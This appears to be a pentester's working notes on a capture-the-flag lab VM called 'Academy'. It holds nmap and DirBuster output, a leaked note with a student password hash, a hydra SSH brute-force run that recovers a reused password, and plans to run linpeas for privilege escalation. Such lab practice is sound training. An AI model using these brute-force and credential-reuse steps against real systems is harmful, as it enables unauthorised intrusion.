Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 17:44 EDTNmap scan report for 10.0.2.6Host is up (0.062s latency).Not shown: 997 closed tcp ports (reset)PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.322/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)80/tcp open http Apache httpd 2.4.38 ((Debian))MAC Address: 08:00:27:5D:4C:44 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Device type: general purposeRunning: Linux 4.X|5.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)Network Distance: 1 hopService Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 18.25 seconds
nmap -T4 -p- -A 10.0.2.6:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 17:36 EDTNmap scan report for 10.0.2.6Host is up (0.093s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.3| ftp-syst:| STAT:| FTP server status:| Connected to ::ffff:10.0.2.5| Logged in as ftp| TYPE: ASCII| No session bandwidth limit| Session timeout in seconds is 300| Control connection is plain text| Data connections will be plain text| At session startup, client count was 4| vsFTPd 3.0.3 - secure, fast, stable|_End of status| ftp-anon: Anonymous FTP login allowed (FTP code 230)|_-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)| ssh-hostkey:| 2048 c7:44:58:86:90:fd:e4:de:5b:0d:bf:07:8d:05:5d:d7 (RSA)| 256 78:ec:47:0f:0f:53:aa:a6:05:48:84:80:94:76:a6:23 (ECDSA)|_ 256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519)80/tcp open http Apache httpd 2.4.38 ((Debian))|_http-title: Apache2 Debian Default Page: It works|_http-server-header: Apache/2.4.38 (Debian)MAC Address: 08:00:27:5D:4C:44 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Device type: general purposeRunning: Linux 4.X|5.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5OS details: Linux 4.15 - 5.19Network Distance: 1 hopService Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTEHOP RTT ADDRESS1 92.68 ms 10.0.2.6OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 30.35 seconds
dir fuzzing results:
dirbuster results:
DirBuster 1.0-RC1 - Reporthttp://www.owasp.org/index.php/Category:OWASP_DirBuster_ProjectReport produced on Thu Mar 20 10:38:33 EDT 2025--------------------------------http://10.0.2.6:80--------------------------------Directories found during testing:Dirs found with a 200 response://academy//academy/assets/js//academy/assets//academy/admin//academy/assets/css//academy/assets/fonts//academy/assets/img//academy/admin/assets//academy/admin/assets/js//academy/admin/assets/css//academy/admin/assets/fonts//academy/admin/assets/img//academy/includes//academy/db//academy/admin/includes//phpmyadmin/Dirs found with a 403 response:/icons//icons/small//phpmyadmin/templates//phpmyadmin/themes//phpmyadmin/doc//phpmyadmin/doc/html//phpmyadmin/examples//phpmyadmin/js//phpmyadmin/libraries//phpmyadmin/vendor//phpmyadmin/doc/html/_images//phpmyadmin/vendor/google//phpmyadmin/js/vendor//phpmyadmin/setup/lib//phpmyadmin/sql//phpmyadmin/themes/original//phpmyadmin/themes/original/img//phpmyadmin/themes/original/css/Dirs found with a 401 response:/phpmyadmin/setup/--------------------------------Files found during testing:Files found with a 301 responce:/icons/small/academy/assets/img/academy/admin/academy/assets/academy/admin/assets/academy/academy/admin/assets/img/academy/includes/academy/assets/css/academy/admin/includes/academy/db/academy/admin/assets/css/academy/assets/js/academy/admin/assets/js/academy/assets/fonts/academy/admin/assets/fonts/phpmyadmin/themes/phpmyadmin/phpmyadmin/doc/phpmyadmin/doc/html/phpmyadmin/examples/phpmyadmin/js/phpmyadmin/doc/html/_images/phpmyadmin/vendor/phpmyadmin/vendor/google/phpmyadmin/js/vendor/phpmyadmin/sql/phpmyadmin/themes/original/phpmyadmin/themes/original/img/phpmyadmin/themes/original/cssFiles found with a 200 responce:/icons/README/academy/index.php/academy/assets/js/bootstrap.js/academy/assets/js/jquery-1.11.1.js/academy/admin/index.php/academy/assets/fonts/FontAwesome.otf/academy/assets/css/bootstrap.css/academy/assets/css/style.css/academy/admin/assets/js/bootstrap.js/academy/assets/fonts/fontawesome-webfont.eot/academy/admin/assets/js/jquery-1.11.1.js/academy/assets/css/font-awesome.css/academy/admin/assets/css/bootstrap.css/academy/assets/fonts/fontawesome-webfont.svg/academy/admin/assets/css/style.css/academy/assets/fonts/fontawesome-webfont.woff/academy/admin/assets/fonts/FontAwesome.otf/academy/assets/fonts/fontawesome-webfont.ttf/academy/admin/assets/fonts/fontawesome-webfont.eot/academy/assets/fonts/fontawesome-webfont.woff2/academy/assets/fonts/glyphicons-halflings-regular.eot/academy/assets/fonts/glyphicons-halflings-regular.svg/academy/admin/assets/fonts/fontawesome-webfont.ttf/academy/admin/assets/fonts/fontawesome-webfont.svg/academy/admin/assets/fonts/fontawesome-webfont.woff/academy/admin/assets/fonts/glyphicons-halflings-regular.eot/academy/assets/fonts/glyphicons-halflings-regular.woff/academy/assets/fonts/glyphicons-halflings-regular.woff2/academy/admin/assets/fonts/glyphicons-halflings-regular.woff/academy/admin/assets/fonts/glyphicons-halflings-regular.svg/academy/admin/assets/fonts/glyphicons-halflings-regular.woff2/academy/assets/fonts/glyphicons-halflings-regular.ttf/academy/admin/assets/css/font-awesome.css/academy/includes/config.php/academy/includes/footer.php/academy/includes/menubar.php/academy/includes/header.php/academy/admin/assets/fonts/glyphicons-halflings-regular.ttf/academy/admin/assets/fonts/fontawesome-webfont.woff2/academy/db/onlinecourse.sql/academy/admin/includes/config.php/academy/admin/includes/footer.php/academy/admin/includes/header.php/academy/admin/includes/menubar.php/academy/logout.php/academy/admin/logout.php/phpmyadmin/index.php/phpmyadmin/themes.php/phpmyadmin/ajax.php/phpmyadmin/navigation.php/phpmyadmin/license.php/phpmyadmin/README/phpmyadmin/logout.php/phpmyadmin/changelog.php/phpmyadmin/export.php/phpmyadmin/ChangeLog/phpmyadmin/js/messages.php/phpmyadmin/sql.php/phpmyadmin/LICENSEFiles found with a 302 responce:/academy/print.php/academy/admin/print.php/academy/admin/course.php/academy/admin/department.php/phpmyadmin/url.php/academy/enroll.php/academy/admin/session.phpFiles found with a 403 responce:/phpmyadmin/templates/phpmyadmin/libraries/phpmyadmin/setup/libFiles found with a 401 responce:/phpmyadmin/setup--------------------------------
directory notes:
http://10.0.2.6/academy/admin/ seems to have default admin:admin credentials tf
http://10.0.2.6/academy/index.php seems interesting. need student creds to login. will have to find that elsewhere i think. imma try enumming ftp next
http://10.0.2.6/phpmyadmin/index.php might wanna try SQLi. simple payloads didnt work tho
ftp files:
note.txt:
Hello Heath !Grimmie has setup the test website for the new academy.I told him not to use the same password everywhere, he will change it ASAP.I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command:INSERT INTO `students` (`StudentRegno`, `studentPhoto`, `password`, `studentName`, `pincode`, `session`, `department`, `semester`, `cgpa`, `creationdate`, `updationDate`) VALUES('10201321', '', 'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '', '', '7.60', '2021-05-29 14:36:56', '');The StudentRegno number is what you use for login.Le me know what you think of this open-source project, it's from 2020 so it should be secure... right ?We can always adapt it to our needs.-jdelta
we got access as user www-data. will try to see if any priv escalation is possible with peass
process:
make a python server where the peass file is stored (see python server creation) and wget the file in the victim machine. tried it in the root dir but it didnt work. worked in the tmp directory though
give the linpeas file execution perm and run it. preferably save the output in a file
will try to ssh bruteforce using the 4 usernames we already have with hydra:
┌──(root㉿kali)-[~/Desktop/projects/academy]└─#hydra -L users.txt -p My_V3ryS3cur3_P4ss 10.0.2.6 sshHydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-21 09:22:28[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:4/p:1), ~1 try per task[DATA] attacking ssh://10.0.2.6:22/[22][ssh] host: 10.0.2.6 login: grimmie password: My_V3ryS3cur3_P4ss1 of 1 target successfully completed, 1 valid password foundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-21 09:22:43
so the password is for grimmie
grimmie:My_V3ryS3cur3_P4ss
wait lets see if we can login to http://10.0.2.6/phpmyadmin/index.php with these creds
WE SURE CAN
gonna ssh into the server as grimmie now. lets see what privilages he has
grimmie@academy:~$ groups
administrator cdrom floppy audio dip video plugdev netdev
hmmm seems like grimmie is an admin. also has a backup.sh file in his home directory. lets see what it does